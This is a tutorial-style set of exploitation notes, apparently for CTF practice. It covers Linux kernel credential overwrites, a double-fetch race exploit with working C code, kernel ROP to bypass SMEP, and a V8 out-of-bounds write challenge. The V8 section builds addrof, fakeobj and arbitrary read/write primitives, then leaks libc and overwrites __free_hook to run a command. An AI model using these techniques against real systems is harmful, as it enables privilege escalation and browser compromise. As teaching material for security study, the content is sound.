kuid_t fsuid; /* UID for VFS ops */
kgid_t fsgid; /* GID for VFS ops */
/* ... */
} __randomize_layout;
These fields are all unsigned integers, and they represent what you would expect - the UID, GID, and a few other less common IDs for other operations (such as the FSUID, which is checked when accessing a file on the filesystem). As you might expect, overwriting one or more of these fields is a pretty desirable goal.
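To make that concrete, here is a rough sketch (mine, not from any particular challenge) of what an exploit with an arbitrary kernel write might do, assuming we have already leaked the address of our own cred struct and that structure layout randomisation is off - cred_addr and arb_write() are hypothetical primitives:
#include <stdint.h>

// hypothetical: arb_write() writes a 32-bit value to an arbitrary kernel
// address, cred_addr is the leaked address of our task's struct cred
void become_root(uint64_t cred_addr, void (*arb_write)(uint64_t addr, uint32_t val)) {
    // uid, gid, suid, sgid, euid, egid, fsuid and fsgid sit as eight consecutive
    // 32-bit fields near the start of struct cred; the offset of 8 assumes the
    // usage counter comes first and __randomize_layout is not in effect
    for (int i = 0; i < 8; i++)
        arb_write(cred_addr + 8 + i * 4, 0);   // 0 == root for all of them
}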
The kernel needs to store information about each running task, and to do this it uses the task_struct
structure. Each kernel task has its own instance.
struct task_struct {
/* ... */
/*
* Pointers to the (original) parent process, youngest child, younger sibling,
* older sibling, respectively. (p->father can be replaced with
* p->real_parent->pid)
*/
/* Real parent process: */
struct task_struct __rcu *real_parent;
/* Recipient of SIGCHLD, wait4() reports: */
struct task_struct __rcu *parent;
/*
* Children/sibling form the list of natural children:
*/
struct list_head children;
struct list_head sibling;
struct task_struct *group_leader;
/* ... */
/* Objective and real subjective task credentials (COW): */
const struct cred __rcu *real_cred;
/* Effective (overridable) subjective task credentials (COW): */
const struct cred __rcu *cred;
/* ... */
};
The task_struct
instances are stored in a linked list, with a global kernel variable init_task
pointing to the first one. Each task_struct
then points to the next.
Along with linking data, the task_struct
also (more importantly) stores real_cred
and cred
, which are both pointers to a cred
struct. The difference between the two is explained here:
/*
* The security context of a task
*
* The parts of the context break down into two categories:
*
* (1) The objective context of a task. These parts are used when some other
* task is attempting to affect this one.
*
* (2) The subjective context. These details are used when the task is acting
* upon another object, be that a file, a task, a key or whatever.
*
* Note that some members of this structure belong to both categories - the
* LSM security pointer for instance.
*
* A task has two security pointers. task->real_cred points to the objective
* context that defines that task's actual details. The objective part of this
* context is used whenever that task is acted upon.
*
* task->cred points to the subjective context that defines the details of how
* that task is going to act upon another object. This may be overridden
* temporarily to point to another security context, but normally points to the
* same context as task->real_cred.
*/
In effect, cred
is the set of permissions used when we are trying to act on something, and real_cred
when something is trying to act on us. The majority of the time, both will point to the same structure, but a common exception is with setuid executables, which will modify cred
but not real_cred
.
So, which set of credentials do we want to target with an arbitrary write? Honestly, I'm not entirely sure - it feels as if we want to update cred
, as that will change our abilities to read and execute files. Despite that, I have seen writeups overwrite real_cred
, so perhaps I am wrong in that - though, again, they usually point to the same struct and therefore would have the same effect.
Once I work it out, I shall update this (TODO!).
As an alternative to overwriting cred
structs in the unpredictable kernel heap, we can call prepare_kernel_cred()
to generate a new valid cred
struct and commit_creds()
to overwrite the real_cred
and cred
of the current task_struct
.
The function can be found here, but there's not much to say - it creates a new cred
struct called new
, copies the old one into it, and then drops its reference to the old
. It returns new
.
If NULL is passed as the argument, it will return a new set of credentials that match the init_task
credentials, which default to root credentials. This is very important, as it means that calling prepare_kernel_cred(0)
results in a new set of root creds!
This last part is actually not true on newer kernel versions - check out Debugging the Kernel Module section!
This function is found here, but ultimately it will update task->real_cred
and task->cred
to the new credentials:
rcu_assign_pointer(task->real_cred, new);
rcu_assign_pointer(task->cred, new);
TODO
$ readelf -d source
Dynamic section at offset 0x2f14 contains 24 entries:
Tag Type Name/Value
0x00000005 (STRTAB) 0x804825c
0x00000006 (SYMTAB) 0x804820c
0x00000017 (JMPREL) 0x80482d8
[...]
$ readelf -r source
Relocation section '.rel.dyn' at offset 0x2d0 contains 1 entry:
Offset Info Type Sym.Value Sym. Name
0804bffc 00000206 R_386_GLOB_DAT 00000000 __gmon_start__
Relocation section '.rel.plt' at offset 0x2d8 contains 2 entries:
Offset Info Type Sym.Value Sym. Name
0804c00c 00000107 R_386_JUMP_SLOT 00000000 gets@GLIBC_2.0
0804c010 00000307 R_386_JUMP_SLOT 00000000 __libc_start_main@GLIBC_2.0
typedef uint32_t Elf32_Addr;
typedef uint32_t Elf32_Word;
typedef struct
{
Elf32_Addr r_offset; /* Address */
Elf32_Word r_info; /* Relocation type and symbol index */
} Elf32_Rel;
/* How to extract and insert information held in the r_info field. */
#define ELF32_R_SYM(val) ((val) >> 8)
#define ELF32_R_TYPE(val) ((val) & 0xff)
typedef struct
{
Elf32_Word st_name ; /* Symbol name (string tbl index) */
Elf32_Addr st_value ; /* Symbol value */
Elf32_Word st_size ; /* Symbol size */
unsigned char st_info ; /* Symbol type and binding */
unsigned char st_other ; /* Symbol visibility under glibc>=2.2 */
Elf32_Section st_shndx ; /* Section index */
} Elf32_Sym ;
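As a quick worked example of those macros (my own snippet, using the readelf output above): the Info value 0x107 on the gets relocation splits into symbol index 1 and relocation type 7 (R_386_JUMP_SLOT):
#include <stdio.h>
#include <stdint.h>

#define ELF32_R_SYM(val)  ((val) >> 8)
#define ELF32_R_TYPE(val) ((val) & 0xff)

int main(void) {
    uint32_t r_info = 0x107;   // Info column for gets@GLIBC_2.0 above
    // prints "sym = 1, type = 7" - entry 1 of .dynsym, type R_386_JUMP_SLOT
    printf("sym = %u, type = %u\n", ELF32_R_SYM(r_info), ELF32_R_TYPE(r_info));
    return 0;
}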
The most simple of vulnerabilities
A double-fetch vulnerability is when data is accessed from userspace multiple times. Because userspace programs will commonly pass parameters in to the kernel as pointers, the data can be modified at any time. If it is modified at the exact right time, an attacker could compromise the execution of the kernel.
Let's start with a convoluted example, where all we want to do is change the id
that the module stores. We are not allowed to set it to 0
, as that is the ID of root
, but all other values are allowed.
The code below will be the contents of the write()
function of a kernel module. I've removed the boilerplate code mentioned previously, but here are the relevant parts:
#define PASSWORD "p4ssw0rd"
typedef struct {
int id;
char password[10];
} Credentials;
static int id = 1001;
static ssize_t df_write(struct file *filp, const char __user *buf, size_t count, loff_t *f_pos) {
Credentials *creds = (Credentials *)buf;
printk(KERN_INFO "[Double-Fetch] Reading password from user...");
if (creds->id == 0) {
printk(KERN_ALERT "[Double-Fetch] Attempted to log in as root!");
return -1;
}
// to increase reliability
msleep(1000);
if (!strcmp(creds->password, PASSWORD)) {
id = creds->id;
printk(KERN_INFO "[Double-Fetch] Password correct! ID set to %d", id);
return id;
}
printk(KERN_ALERT "[Double-Fetch] Password incorrect!");
return -1;
}
The program will:
Check if the ID we are attempting to switch to is 0
If it is, it doesn't allow us, as we attempted to log in as root
Sleep for 1 second (this is just to illustrate the example better, we will remove it later)
Compare the password to p4ssw0rd
If it is, it will set the id
variable to the id
in the creds
structure
Let's say we want to communicate with the module, and we set up a simple C program to do so:
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
typedef struct {
int id;
char password[10];
} Credentials;
int main() {
int fd = open("/dev/double_fetch", O_RDWR);
printf("FD: %d\n", fd);
Credentials creds;
creds.id = 900;
strcpy(creds.password, "p4ssw0rd");
int res_id = write(fd, &creds, 0); // last parameter here makes no difference
printf("New ID: %d\n", res_id);
return 0;
}
We compile this statically (as there are no shared libraries on our VM):
gcc -static -o exploit exploit.c
As expected, the id
variable gets set to 900
- we can check this in dmesg
:
$ dmesg
[...]
[ 3.104165] [Double-Fetch] Password correct! ID set to 900
That all works fine.
The flaw here is that creds->id
is dereferenced twice. What does this mean? The kernel module is passed a reference to a Credentials
struct:
Credentials *creds = (Credentials *)buf;
This is a pointer, and that is perhaps the most important thing to remember. When we interact with the module, we give it a specific memory address. This memory address holds the Credentials
struct that we define and pass to the module. The kernel does not have a copy - it relies on the user's copy, and goes to userspace memory to use it.
Because this struct is controlled by the user, they have the power to change it whenever they like.
The kernel module uses the id
field of the struct on two separate occasions. Firstly, to check that the ID we wish to swap to is valid (not 0
):
if (creds->id == 0) {
printk(KERN_ALERT "[Double-Fetch] Attempted to log in as root!");
return -1;
}
And once more, to set the id
variable:
if (!strcmp(creds->password, PASSWORD)) {
id = creds->id;
printk(KERN_INFO "[Double-Fetch] Password correct! ID set to %d", id);
return id;
}
Again, this might seem fine - but it's not. What is stopping it from changing in between these two uses? The answer is simple: nothing. That is what differentiates userspace exploitation from kernel space.
In between the two dereferences of creds->id
, there is a timeframe. Here, we have artificially extended it (by sleeping for one second). We have a race condition - the aim is to switch id
in that timeframe. If we do this successfully, we will pass the initial check (as the ID will start off as 900
), but by the time it is copied to id
, it will have become 0
and we have bypassed the security check.
Here's the plan, visually, if it helps:
In the waiting period, we swap out the id
.
With that in mind, the "exploit" is fairly self-explanatory - we start another thread, wait 0.3 seconds, and change id
!
// gcc -static -o exploit -pthread exploit.c
#include <fcntl.h>
#include <pthread.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
void *switcher(void *arg);
typedef struct {
int id;
char password[10];
} Credentials;
int main() {
// communicate with the module
int fd = open("/dev/double_fetch", O_RDWR);
printf("FD: %d\n", fd);
// use a random ID and set the password correctly
Credentials creds;
creds.id = 900;
strcpy(creds.password, "p4ssw0rd");
// set up the switcher thread
// pass it a pointer to `creds`, so it can modify it
pthread_t thread;
if (pthread_create(&thread, NULL, switcher, &creds)) {
fprintf(stderr, "Error creating thread\n");
return -1;
}
// now we write the cred struct to the module
// it should be swapped after about .3 seconds by switcher
int res_id = write(fd, &creds, 0);
// write returns the id we switched to
// if all goes well, that is 0
printf("New ID: %d\n", res_id);
// finish thread cleanly
if (pthread_join(thread, NULL)) {
fprintf(stderr, "Error joining thread\n");
return -1;
}
return 0;
}
void *switcher(void *arg) {
Credentials *creds = (Credentials *)arg;
// wait until the module is sleeping - don't want to change it BEFORE the initial ID check!
usleep(300 * 1000); // sleep() only takes whole seconds, so use usleep() to wait 0.3s
creds->id = 0;
return NULL;
}
We have to compile it statically, as the VM has no shared libraries.
$ gcc -static -o exploit -pthread exploit.c
Now we have to somehow get it into the file system. In order to do that, we need to first extract the .cpio
archive (you may want to do this in another folder):
$ cpio -i -F initramfs.cpio
Now copy exploit
there and make sure it's marked executable. You can then compress the filesystem again:
$ find . -not -name "*.cpio" | cpio -o -H newc > initramfs.cpio
Use the newly-created initramfs.cpio
to launch the VM with run.sh
. Executing exploit
, it is successful!
~ # ./exploit
FD: 3
New ID: 0
Supervisor Memory Access Protection
SMAP is a more powerful version of SMEP. Where SMEP prevents userspace code from being executed by the kernel, SMAP places heavy restrictions on accessing user space at all, even for data. SMAP blocks the kernel from dereferencing (i.e. accessing) anything that isn't in kernel space unless it goes through a small set of very specific functions.
For example, functions such as strcpy
or memcpy
do not work for copying data to and from user space when SMAP is enabled. Instead, we are provided the functions copy_from_user
and copy_to_user
, which are allowed to briefly bypass SMAP for the duration of their operation. These functions also have additional hardening against attacks such as buffer overflows, with the function __copy_overflow
acting as a guard against them.
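For comparison with the vulnerable handlers from earlier, a SMAP-friendly write handler might look something like the sketch below (mine, not one of the challenge modules; as a module fragment it needs <linux/uaccess.h> for copy_from_user):
static ssize_t safe_write(struct file *filp, const char __user *buf, size_t count, loff_t *f_pos) {
    char kbuf[0x20];

    // clamp the size ourselves before touching anything
    if (count > sizeof(kbuf))
        count = sizeof(kbuf);

    // copy_from_user handles the userspace access (briefly lifting SMAP for the
    // copy); it returns the number of bytes it could NOT copy, so non-zero means failure
    if (copy_from_user(kbuf, buf, count))
        return -EFAULT;

    // from here on we only operate on kbuf, the kernel-space snapshot of the data
    return count;
}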
This means that whether you interact using write
/read
or ioctl
, the structs that you pass via pointers all get copied to kernel space using these functions before they are messed around with. This also means that double-fetches are even more unlikely to occur as all operations are based on the snapshot of the data that the module took when copy_from_user
was called (unless copy_from_user
is called on the same struct multiple times).
Like SMEP, SMAP is controlled by the CR4 register, in this case the 21st bit. It is also pinned on boot, so overwriting CR4 does nothing, and instead we have to work around it. There is no specific "bypass"; it will depend on the challenge and will simply have to be accounted for.
Enabling SMAP is just as easy as SMEP:
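The flag itself isn't reproduced here, but presumably it just mirrors the SMEP one, with +smap added to the list of CPU features:
-cpu qemu64,+smep,+smap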
Setting Up
Ok so first off, we're gonna need an old VM. Why? It's an old challenge with an old version of v8. Back then, the v8 version compilation steps required the python
command to point at python2
instead of python3
like on my ParrotOS VM, and there is the odd other quirk too. Long story short, there is a very real possibility of needing to jerry-rig a bunch of stuff, and I don't want to break a VM I actually use. Whoops.
So, we're gonna use an Ubuntu 18.04 VM. Grab the ISO file (amd64 version) and set up a VM in VMware Workstation or your preferred virtualisation program.
Now we want to set up the system we're actually attacking. Instead of building v8 itself, we're going to build d8, the REPL (read–eval–print loop) for v8. It's essentially the command-line of v8, meaning we can compile less.
First off, install useful stuff.
Now let's grab the depot_tools
, which is needed for building v8, then add it to our PATH
:
Restart terminal for PATH
to update. Then in folder of choice (I am in ~/Desktop/oob-v8
), we fetch v8 and install all the dependencies needed to build it:
The next step is to checkout
the commit that the challenge is based on, then sync the local files to that:
Now we want to apply the diff
file we get given. The challenge archive can be found online, and we'll extract it. The oob.diff
file defines the changes made to the source code since the commit we checked out, which includes the vulnerability.
Now let's apply it then prepare and build the release version:
But there is a small problem when it gets run:
Apparently, this is because in Python 3.8+ lru_cache
gained a user_function
argument. We can try and update to Python 3.8, but the fear is that it will break something. Oh well! Let's try anyway.
Now we have Python 3.8 installed in /usr/bin/python3.8
, we can try and overwrite the symlink /usr/bin/python3
to point here instead of the default 3.6.9 version that came with the ISO.
Now we hope and pray that rerunning the ninja
command breaks nothing:
Ok, no ninja
. Let's install it:
Then run it again:
And it starts working! The output release
version is found in v8/out.gn/x64.release/d8
. Now let's build debug.
And it's done. Epic!
I'm going to revert default Python to version 3.6 to minimise the possibility of something breaking.
I'm also going to install gef, the GDB extension. gef
is actively maintained, and also actually supports Ubuntu 18.04 (which pwndbg
does not, although that's due to requiring Python 3.8+, which we have technically set up in a roundabout way - use at your own risk!).
Now we can move on to the challenge itself.
Bypassing SMEP by ropping through the kernel
The previous approach failed, so let's try and escalate privileges using purely ROP.
First, we have to change the ropchain. Start off with finding some useful gadgets and calling prepare_kernel_cred(0)
:
Now comes the trickiest part, which involves moving the result from RAX to RDI before calling commit_creds()
.
This requires stringing together a collection of gadgets (which took me an age to find). See if you can find them!
I ended up combining these four gadgets:
Gadget 1 is used to set RDX to 0
, so we bypass the jne
in Gadget 2 and hit ret
Gadget 2 and Gadget 3 move the returned cred struct from RAX to RDX
Gadget 4 moves it from RAX to RDI, then compares RDI to RDX. We need these to be equal to bypass the jne
and hit the ret
Recall that we need swapgs
and then iretq
. Both can be found easily.
The pop rbp; ret
is not important as iretq
jumps away anyway.
To simulate the pushing of RIP, CS, SS, etc we just create the stack layout as it would expect - RIP|CS|RFLAGS|SP|SS
, the reverse of the order they are pushed in.
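In C, the tail of the ropchain would look something like this sketch (the gadget addresses are placeholders, and it assumes a clean swapgs; ret gadget - if yours pops a register first, add a junk qword for it; the user_* values come from save_state() as before, and payload/i are the overflow array from the earlier exploit):
payload[i++] = SWAPGS_GADGET;   // swapgs ; ret           (placeholder address)
payload[i++] = IRETQ_GADGET;    // iretq                  (placeholder address)
payload[i++] = user_rip;        // RIP -> get_shell
payload[i++] = user_cs;         // CS
payload[i++] = user_rflags;     // RFLAGS
payload[i++] = user_rsp;        // RSP
payload[i++] = user_ss;         // SS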
If we try this now, we successfully escalate privileges!
The actual challenge
Let's first read the patch itself:
In essence, there is a new function ArrayOob
that is implemented. We can see it's added to the array object as a .oob()
method:
There's the odd bit of other stuff thrown around for getting it working, but the actual source of the challenge is (unsurprisingly) ArrayOob
itself (with a name like that, who would have thought?). Cleaned up a little, it looks like this:
Familiarity with the V8 codebase is unlikely, and even if you are familiar with it, it's unlikely you can read it like a native language.
It looks at the number of arguments the function takes, then stores it in len
If len
is greater than 2
, it throws an error (note that the first argument is always this
, so in reality it's just one).
It then gets the array in question, stored in array
array
is cast to a FixedDoubleArray
, an array of fixed size that stores doubles, called elements
The length of the array is stored in length
If there is no argument (len == 1
, i.e. only this
is passed) then elements[length]
is returned as a number
This is a clear Out-Of-Bounds (OOB) Read, as arrays in javascript are zero-indexed like most other programming languages
If an argument is given, elements[length]
is set to the value
that is the argument cast to a Number with Object::ToNumber
This is a clear Out-Of-Bounds (OOB) Write, for the same reason as above
So we have a very clear OOB vulnerability, allowing both a read and a write to one index further than the maximum length of the array. This begs an important question: what exists past the end of an array?
First, let's talk about data types in V8 and how they are represented.
V8 uses pointers, doubles and smis (standing for immediate small integers). Since it has to distinguish between these values, they are all stored in memory with slight differences.
A double is stored as its 64-bit binary representation (easy)
An smi is a 32-bit number, but it's stored as itself left-shifted by 32
so the bottom 32 bits are null
e.g. 0x12345678
is stored as 0x1234567800000000
A pointer to an address addr
is stored as addr | 1
, that is the least significant bit is set to 1
.
e.g. 0x12345678
is stored as 0x12345679
This helps differentiate it from an smi, but not from a double!
V8 refers to pointers as HeapObjects as well.
Any output you get will always be in floating-point form; this is because V8 actually doesn't have a way to express 64-bit integers normally. We need a way to convert floating-point outputs to hexadecimal addresses (and vice versa!). To do this, we'll use the standard approach, which is as follows:
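The snippet itself isn't reproduced above, but the usual helpers look something like this - a Float64Array and a Uint32Array sharing one 8-byte buffer:
var buf = new ArrayBuffer(8);           // 8 bytes shared between both views
var f64_buf = new Float64Array(buf);
var u32_buf = new Uint32Array(buf);

// float -> 64-bit integer (as a BigInt)
function ftoi(val) {
    f64_buf[0] = val;
    return BigInt(u32_buf[0]) + (BigInt(u32_buf[1]) << 32n);
}

// 64-bit integer (BigInt) -> float
function itof(val) {
    u32_buf[0] = Number(val & 0xffffffffn);
    u32_buf[1] = Number(val >> 32n);
    return f64_buf[0];
}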
You'll see these functions in most V8 exploits. They essentially just convert between interpreting data as floating-point form or as integers.
We're going to throw this into a javascript file exploit.js
. If we want to use these functions, we can simply pass them to d8 in the command line:
The Map is an incredibly important V8 data structure, storing key information such as
The dynamic type of the object (e.g. String, Uint8Array, etc)
The size of the object in bytes
The properties of the object and where they are stored
The type of the array elements (e.g. unboxed doubles, tagged pointers, etc)
Each javascript object is linked to a map. While the property names are usually stored in the map, the values are stored with the object itself. This allows objects with the same sort of structure to share maps, increasing efficiency.
There are three different regions in which property values can be stored:
Inside the object itself (inline properties)
In a separate dynamically-sized heap buffer (out-of-line properties)
If the property name is an integer index, then as array elements in a dynamically-sized heap array
to be honest, I'm not entirely sure what this means, but I'll get it eventually
In the first two cases, the Map stores each property of the object with a linked slot number. Each object then contains all of the property values, matching with the slot number of the relevant property. The object does not store the name of the property, only the slot number.
I promise this makes sense - for example, let's take two array objects:
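The objects themselves aren't shown above, but something along these lines (the property values here are my own) gives the layout described below:
let object1 = {a: 40, b: 50};
let object2 = {a: 42, b: 52};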
Once this is run, memory will contain two JSObject
instances and one Map
:
We can see that the Map
stores the properties a
and b
, giving them the slot values 0
and 1
respectively. The two objects object1
and object2
, because of their identical structure, both use Map1
as a map. The objects do not themselves know the name of the properties, only the slot values, which they assign a value to.
However, if we add another property - say c
, with value 60
- to object1
, they stop sharing the map:
If we then added a property c
to object2
, they would then share Map1
again! This works by assigning each map something called a transition table, which is just a note of which map to transition to if a property of a certain name (and possibly type) is added to it. In the example above, Map2
would make a note that if a property c
is added to object2
then it should transition to use Map1
.
Let's see how this works out in memory for arrays using the debug
version of d8, along with the incredibly helpful %DebugPrint()
feature that comes along with it. We'll run it under gdb
so we can analyse memory as well, and make connections between all the parts.
Instead of creating our own objects, let's focus specifically on how it works for arrays, as that is what we are dealing with here.
That is a lot of information. Let's sift through the relevant parts.
Firstly, we notice that a
is a type JSArray
, stored in memory at 0x30b708b4dd70
. The array's map is stored at 0x09bccc0c2ed8
, with the properties (in this case length
) stored at 0x3659bdb00c70
. The elements
themselves are in a FixedDoubleArray
stored at 0x30b708b4dd50
.
Let's view memory itself. Hit Ctrl-C
and you'll go to the gef
prompt. Let's view the memory at the location of the JSArray
object itself, 0x30b708b4dd70
.
So the JSArray
first has its pointer to its own map, then a pointer to its properties, then a pointer to its elements and then its length (note that length
will be an smi, so a length of 2
is actually represented in memory as 2<<32
!).
One thing that is very curious is that the elements
array is actually located 0x20
bytes before the JSArray
object itself in memory. Interesting! Let's view it:
Note that elements
itself is a FixedDoubleArray
, so the first value will be a pointer to its map at 0x00003659bdb014f8
; this map doesn't concern us right now. The next value is the length of the FixedDoubleArray
, the smi of 0x2
again. After this, it gets interesting.
As expected, the next two entries are the doubles representing 1.5
and 2.5
, the entries in the array:
But immediately after in memory is the original JSArray
. So? Well, if we have an OOB read/write to an extra index past the array, the value we are accessing is the pointer in the JSArray
that points to the map. We can write to and read the map of the array.
Just to confirm this is correct, we're going to run the release version of d8 and check the output of .oob()
. The reason we have to use release is that the debug version has a lot more safety and OOB checks (I assume for fuzzing purposes) so will just break if we try to use a.oob()
. We need to run it with --shell exploit.js
, and you'll see why in a second.
Now we need to use our ftoi()
function to convert it to a hexadecimal integer:
Note that ftoi()
only exists because of the --shell
, which is why we needed it.
If our reasoning is correct, this is a pointer to the map, which is located at 0x2a0a9af82ed9
. Let's compare with what GDB tells us:
The first value at the location of the JSArray
is, as we saw earlier, the pointer to the map. Not only that, but we successfully read it! Look - it's 0x2a0a9af82ed9
again!
Now we know we can read and write to the map that the array uses. How do we go from here?
The important thing to note is that sometimes a program will store values (pass by value), and sometimes it will store a pointer to a value (pass by reference). We can abuse this functionality, because an array of doubles will store the double values themselves while an array of objects will store pointers to the objects.
This means there is an extra link in the chain - if we do array[2]
on an array of doubles, V8 will go to the address in memory, read the value there, and return it. If we do array[2]
on an array of objects, V8 will go to the address in memory, read the value there, go to that address in memory, and return the object placed there.
We can see this behaviour by defining two arrays, one of doubles and one of custom objects:
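The definitions aren't shown above, but they would be along these lines - the 1.5 and 2.5 match the debug output below, while the contents of the custom objects are my own guess:
let obj1 = {a: 1};
let obj2 = {b: 2};

let float_arr = [1.5, 2.5];       // elements stored as raw doubles
let obj_arr   = [obj1, obj2];     // elements stored as pointers to the objects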
Break out to gef
and see the elements
of both arrays.
float_arr
:
Again, 1.5
and 2.5
in floating-point form.
obj_arr
:
Note that the elements
array in the second case has values 0x3a38af8904f1
and 0x3a38af8906b1
. If our suspicions are correct, they would be pointers to the objects obj1
and obj2
. Do c
to continue the d8 instance, and print out the debug for the objects:
And look - so beautifully aligned!
What happens if we overwrite the map of an object array with the map of a float array? Logic dictates that it would treat it as a double rather than a pointer, resulting in a leak of the location of obj1
! Let's try it.
We leak 0x3a38af8904f1
- which is indeed the location of obj1
! We therefore can leak the location of objects. We call this an addrof
primitive, and we can add another function to our exploit.js
to simplify it:
Really importantly, the reason we can set map_obj
and get the map is because obj_arr.oob()
will return the value as a double, which we noted before! If it returned that object itself, the program would crash. You can see this in my writeup.
We can load it up in d8 ourselves and compare the results:
Perfect, it corresponds exactly!
The opposite of the addrof
primitive is called a fakeobj
primitive, and it works in the exact opposite way - we place a memory address at an index in the float array, and then change the map to that of the object array.
From here, an arbitrary read is relatively simple. It's important to remember that whatever fakeobj()
returns is an object, not a read! So if the data there does not form a valid object, it's useless.
The trick here is to create a float array, and then make the first index a pointer to a map for the float array. We are essentially faking an array object inside the actual array. Once we call fakeobj()
here, we have a valid, faked array.
But why does this help? Remember that the third memory address in a JSArray
object is an elements
pointer, which is a pointer to the list of values actually being stored. We can modify the elements
pointer by accessing index 2
of the real array, faking the elements
pointer to point to a location of our choice. Accessing index 0
of the fake array will then read from the fake pointer!
[TODO image, but not sure what exactly would help]
Because we need an index 2
, we're going to make the array of size 4, as 16-byte alignment is typically nice and reduces the probability of things randomly breaking.
Now we want to start an arb_read()
function. We can begin by tagging the pointer, and then placing a fakeobj
at the address of the arb_rw_arr
:
HOWEVER - this is not quite right! We want fake
to point at the first element of the FixedDoubleArray
elements
, so we need an offset of 0x20 bytes back (doubles are 8 bytes of space each, and we know from before that elements
is just ahead of the JSArray
itself in memory). With that offset, it looks like this:
Now we want to access arb_rw_arr[2]
to overwrite the fake elements
pointer in the fake array. We want to set this to the desired RW address addr
, but again we need an offset! This time it's 0x10 bytes, because the first index is 0x10 bytes from the start of the object as the first 8 bytes are a map and the second 8 are the length
smi:
And finally we return the leak. Putting it all together:
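The full read primitive, with the offsets explained above:
function arb_read(addr) {
    // tag pointer
    if (addr % 2n == 0)
        addr += 1n;
    // place a fake object over the elements FixedDoubleArray of the valid array
    // (it sits just ahead in memory, so with a length of 4 that's 4 * 0x8 = 0x20 back)
    let fake = fakeobj(addrof(arb_rw_arr) - 0x20n);
    // overwrite the elements field of the fake array with the target address,
    // minus 0x10 for the map and length smi at the start of a FixedDoubleArray
    arb_rw_arr[2] = itof(BigInt(addr) - 0x10n);
    // index 0 of the fake array now reads from the chosen address
    return ftoi(fake[0]);
}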
Logic would dictate that we could equally get an arbitrary write using the same principle, by simply setting the value instead of returning it. Unfortunately, not quite - if we look at , the initial_arb_write()
function fails:
In the blog post they tell us they're not sure why, and go on to explain the intended method with ArrayBuffer
backing pointers. They also tell us that
The arbitrary write doesn't work with certain addresses due to the use of floats. The overwrite had precision loss with certain addresses, but this wasn't the case with ArrayBuffer backing pointers. The code handles that differently compared to the elements ptr.
I can confirm that running the initial_arb_write()
does, in fact, crash with a SIGSEGV. If anybody finds a fix, I'm sure they would be very interested (and I would too).
An ArrayBuffer
is simply a fixed-length buffer of raw binary data. We combine this with the DataView
object, which lets us read and write that buffer as specific number types. Among these is the ever-useful setBigUint64()
, which is probably where the reliable handling of the integers comes from.
The backing store of an ArrayBuffer
is much like the elements
of a JSArray
, in that it points to the address of the object that actually stores the information. It's placed 0x20 bytes ahead of the ArrayBuffer
in memory (which you can check with GDB).
We will have to use the initial_arb_write()
to perform this singular write, and hope that the address precision is good enough (if not, we just run it again).
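The resulting write primitive - initial_arb_write() here is the unreliable fakeobj-based write discussed above, which appears in the full exploit listing further down:
function arb_write(addr, val) {
    // set up ArrayBuffer and DataView objects
    let buf = new ArrayBuffer(8);
    let dataview = new DataView(buf);
    // the backing store pointer lives 0x20 bytes on from the ArrayBuffer itself
    let buf_addr = addrof(buf);
    let backing_store_addr = buf_addr + 0x20n;
    // redirect the backing store to the target address
    initial_arb_write(backing_store_addr, addr);
    // write the data to offset 0 of the (redirected) buffer, little-endian
    dataview.setBigUint64(0, BigInt(val), true);
}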
From here, it's similar to userland exploitation.
The simplest approach is to overwrite __free_hook with system, as any call to console.log()
will inevitably trigger a free() immediately after. To do this, we'll need a libc leak.
In order for it to be reliable, it'll have to be through a section of memory allocated by V8 itself. We can use GDB to comb through the memory of the area that stored the maps. I'm going to get exploit.js
to print out a bunch of the addresses we have. I'll then try and retrieve every single notable address I can.
Running it multiple times, the last 4 digits are consistent, implying that they're a fixed offset:
That bodes well. Running vmmap
, we can find the region they are in:
So the offsets appear to be 0x2ed9
and 0x2f79
. Let's throw that into exploit.js
and see if that's right by running it again and again. It appears to be, but randomly there is an issue and the address is not even in assigned memory - I assume it's at least in part due to the floating-point issues.
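In exploit.js that's just a case of printing the maps and subtracting the float map offset to recover the region base:
console.log("[+] Float Map: 0x" + ftoi(map_float).toString(16));
console.log("[+] Object Map: 0x" + ftoi(map_obj).toString(16));
let map_reg_start = ftoi(map_float) - 0x2ed9n;
console.log("[+] Map Region Start: 0x" + map_reg_start.toString(16));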
Now we have that, let's try combing through the map region and see if there are any other interesting values at fixed offsets.
We can see that, very close to the start of the region, there appear to be two heap addresses (and more later). This makes sense, as many maps will point to areas of the heap as the heap stores dynamically-sized data.
That seems more useful than what we have right now, so let's grab that and see if the offset is constant. Right now, the offsets are 0xaef60
and 0x212e0
. They appear to be constant. Let's throw those leaks in too.
It all seems to be pretty good, but a heap leak itself is not the most helpful. Let's keep digging, but looking at the heap this time, as that is probably more likely to store libc or binary addresses.
Ok, pretty useless. What about if we actually use the heap addresses we have, and see if there's anything useful there? The first one has nothing useful, but the second:
The vmmap
output for this specific run shows a binary base of 0x555555554000
and a heap base of 0x5555562f9000
. This makes the first address a binary address! Let's make sure it's a consistent offset from the base - and it is! We're also gonna swap the exploit over to use the second heap address we spotted in the map region.
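The updated leaks, using the second heap address (at offset 0x18 into the map region) and the binary pointer found through it:
let heap_leak = arb_read(map_reg_start + 0x18n);
let heap_base = heap_leak - 0x212e0n;
console.log("[+] Heap Base: 0x" + heap_base.toString(16));
let binary_leak = arb_read(heap_leak);
let binary_base = binary_leak - 0xd87ea8n;
console.log("[+] Binary Base: 0x" + binary_base.toString(16));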
Now we just have to work out the GOT offset and read the entry to find libc base!
So the GOT entry is an offset of 0xd9a4c0
from base. Easy leak:
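Reading the GOT entry and subtracting the offset used in the full exploit gives us the libc base:
let read_got = binary_base + 0xd9a4c0n;
console.log("[+] read@got: 0x" + read_got.toString(16));
let read_libc = arb_read(read_got);
console.log("[+] read@libc: 0x" + read_libc.toString(16));
let libc_base = read_libc - 0xbc0430n;
console.log("[+] LIBC Base: 0x" + libc_base.toString(16));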
Then we just need to get system and free_hook offsets, and we are good to go. Pretty easy from inside GDB:
With base 0x7ffff7005000
, the offsets are easy to calculate:
And we can overwrite free hook and pop a calculator:
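The overwrite itself, followed by a console.log() whose freed string becomes the command passed to system():
// system and free hook offsets
let system = libc_base + 0x4f420n;
let free_hook = libc_base + 0x3ed8e8n;
console.log("[+] Exploiting...");
arb_write(free_hook, system);
console.log("xcalc");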
It does, in fact, work!
Unfortunately, as , when running the exploit on the Chrome binary itself (the actual browser provided with the challenge!) the __free_hook
route does not work. It's likely due to a different memory layout as a result of different processes running, so the leaks are not the same and the offsets are broken. Debugging would be nice, but it's very hard with the given binary. Instead we can use another classic approach and abuse WebAssembly to create a RWX page for our shellcode.
This approach is even better because it will (theoretically) work on any operating system and isn't reliant on the presence of libc and __free_hook
